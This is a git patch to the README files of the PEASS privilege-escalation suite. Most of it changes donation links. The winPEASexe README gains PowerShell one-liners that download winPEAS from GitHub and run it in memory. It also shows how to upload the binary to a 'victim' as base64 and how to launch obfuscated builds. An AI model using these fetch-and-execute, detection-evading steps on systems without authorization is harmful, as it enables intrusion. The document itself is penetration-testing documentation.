From f2b66bc711783ae3e34cd8655566e332502df363 Mon Sep 17 00:00:00 2001 From: kali Date: Tue, 16 Feb 2021 10:13:02 -0500 Subject: [PATCH] winPEASv2 --- .github/FUNDING.yml | 2 +- README.md | 2 +- linPEAS/README.md | 2 +- winPEAS/README.md | 2 +- winPEAS/winPEASbat/README.md | 4 +++ winPEAS/winPEASexe/README.md | 49 ++++++++++++++++++++++++++++++++++-- 6 files changed, 55 insertions(+), 6 deletions(-) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index bcd9c6d..4cb452d 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -1 +1 @@ -custom: ['https://www.buymeacoffee.com/carlospolop'] +custom: ['https://www.patreon.com/peass'] diff --git a/README.md b/README.md index e1702dc..335082c 100755 --- a/README.md +++ b/README.md @@ -22,7 +22,7 @@ If you want to **add something** and have **any cool idea** related to this proj ## Please, if this tool has been useful for you consider to donate -[![Buy me a coffee](https://camo.githubusercontent.com/031fc5a134cdca5ae3460822aba371e63f794233/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67)](https://www.buymeacoffee.com/carlospolop) +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) ## Looking for a useful Privilege Escalation Course? diff --git a/linPEAS/README.md b/linPEAS/README.md index ef43e94..1331c52 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -295,7 +295,7 @@ If you want to **add something** and have **any cool idea** related to this proj ## Please, if this tool has been useful for you consider to donate -[![Buy me a coffee](https://camo.githubusercontent.com/031fc5a134cdca5ae3460822aba371e63f794233/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67)](https://www.buymeacoffee.com/carlospolop) +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) ## Looking for a useful Privilege Escalation Course? diff --git a/winPEAS/README.md b/winPEAS/README.md index 477dcfb..62369dc 100755 --- a/winPEAS/README.md +++ b/winPEAS/README.md @@ -16,7 +16,7 @@ If you want to **add something** and have **any cool idea** related to this proj ## Please, if this tool has been useful for you consider to donate -[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=DED2HWDYLFT2C&source=url) +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) ## Looking for a useful Privilege Escalation Course? diff --git a/winPEAS/winPEASbat/README.md b/winPEAS/winPEASbat/README.md index 974319b..cf3a656 100755 --- a/winPEAS/winPEASbat/README.md +++ b/winPEAS/winPEASbat/README.md @@ -129,6 +129,10 @@ This is the kind of outpuf that you have to look for when usnig the winPEAS.bat [More info about icacls here](https://ss64.com/nt/icacls.html) +## Please, if this tool has been useful for you consider to donate + +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) + ## Let's improve PEASS together If you want to **add something** and have **any cool idea** related to this project, please let me know it in the **telegram group https://t.me/peass** or using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)** and we will update the master version. diff --git a/winPEAS/winPEASexe/README.md b/winPEAS/winPEASexe/README.md index 20cc31a..508ee09 100755 --- a/winPEAS/winPEASexe/README.md +++ b/winPEAS/winPEASexe/README.md @@ -12,7 +12,47 @@ Check also the **Local Windows Privilege Escalation checklist** from **[book.hac **.Net >= 4.5 is required** -Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation). +Precompiled binaries: +- Download the **[latest obfuscated version from here](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/binanries/Obfuscated%20Releases)** or **compile it yourself** (read instructions for compilation). +- Non-Obfuscated [winPEASany.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe) +- Non-Obfuscated [winPEASx64.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/binaries/x64/Release/winPEASx64.exe) +- Non-Obfuscated [winPEASx86.exe](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe) + +```bash +#One liner to download and execute winPEASany from memory in a PS shell +$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("") + +#Before cmd in 3 lines +$url = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/raw/master/winPEAS/winPEASexe/binaries/Release/winPEASany.exe" +$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); +[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use + +#Load from disk in memory and execute: +$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS.exe"))); +[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use + +#Load from disk in base64 and execute +##Generate winpeas in Base64: +[Convert]::ToBase64String([IO.File]::ReadAllBytes("D:\Users\user\winPEAS.exe")) | Out-File -Encoding ASCII D:\Users\user\winPEAS.txt +##Now upload the B64 string to the victim inside a file or copy it to the clipboard + + ##If you have uploaded the B64 as afile load it with: +$thecontent = Get-Content -Path D:\Users\victim\winPEAS.txt + ##If you have copied the B64 to the clipboard do: +$thecontent = "aaaaaaaa..." #Where "aaa..." is the winpeas base64 string +##Finally, load binary in memory and execute +$wp = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($thecontent)) +[winPEAS.Program]::Main("") #Put inside the quotes the winpeas parameters you want to use + +#Loading from file and executing a winpeas obfuscated version +##Load obfuscated version +$wp = [System.Reflection.Assembly]::Load([byte[]]([IO.File]::ReadAllBytes("D:\Users\victim\winPEAS-Obfuscated.exe"))); +$wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions sometimes this is different from "winPEAS.Program" +[]::Main("") #Used the ReflectedType name to execute winpeas +``` + +## Parameters + ```bash winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs) winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed @@ -20,7 +60,8 @@ winpeas.exe notcolor #Do not color the output winpeas.exe wait #wait for user input between tests winpeas.exe debug #display additional debug information winpeas.exe log #log output to out.txt instead of standard output -winpeas.exe -lolbas -linpeas=http://127.0.0.1/linpeas.sh #execute also additional LOLBAS search check and linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh) +winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpeas check (runs linpeas.sh in default WSL distribution) with custom linpeas.sh URL (if not provided, the default URL is: https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh) +winpeas.exe -lolbas #Execute also additional LOLBAS search check ``` ## Basic information @@ -216,6 +257,10 @@ If you find any issue, please report it using **[github issues](https://github.c **WinPEAS** is being **updated** every time I find something that could be useful to escalate privileges. +## Please, if this tool has been useful for you consider to donate + +[![paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.patreon.com/peass) + ## Advisory All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.